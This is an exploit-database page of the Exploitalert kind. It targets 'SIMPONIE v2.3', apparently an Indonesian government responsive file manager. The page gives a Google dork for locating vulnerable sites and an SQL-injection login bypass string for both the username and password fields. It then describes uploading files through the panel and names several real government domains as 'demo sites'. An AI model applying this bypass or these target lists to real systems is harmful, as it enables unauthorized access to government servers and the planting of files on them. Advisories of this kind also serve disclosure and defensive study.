Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
CVE-XXXX-XXXX | CWE-XX | $XXXX | High/Low/Medium/Critical |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Author Name | Critical/High/Medium/Low | Remote/Local | 2019-03-12 |
CVSS | EPSS | EPSSP |
---|---|---|
CVSS:7.5/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H | 0.02192 | 0.50148 |
[+]Exploit Title: SIMPONIE v2.3 Indonesia Government Responsive File Manager File Upload [+]Author: Negat1ve [+]Team: -1 [+]Goolge Dork: intext:"SIMPONIE v2.3" [+]Tested on: Windows 10 x64 ======================================= [+]Proof Of Concept: Find website with the dork Login url will be site.go.id/panel/login Login with this detail user: ' or 1=1 limit 1 -- -+ password: ' or 1=1 limit 1 -- -+ You can upload your file via Responsive Drag And Drop File in "Berkas Unggahan" Your files will go to site.go.id/fm/rc/random hash/yourfilename.jpg example: https://simponie2.lebakkab.go.id/fm/rc/988e396409f2ac99c9ec1ab2ce9d879743a03baa/loser.jpg NB: - filetype of this uploader is jpg jpeg png Demo sites: https://simponie2.lebakkab.go.id/panel/login http://simponie.serangkab.go.id/panel/login https://simponie.tangerangselatankota.go.id/panel/login
Copyright ©2024 Exploitalert.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.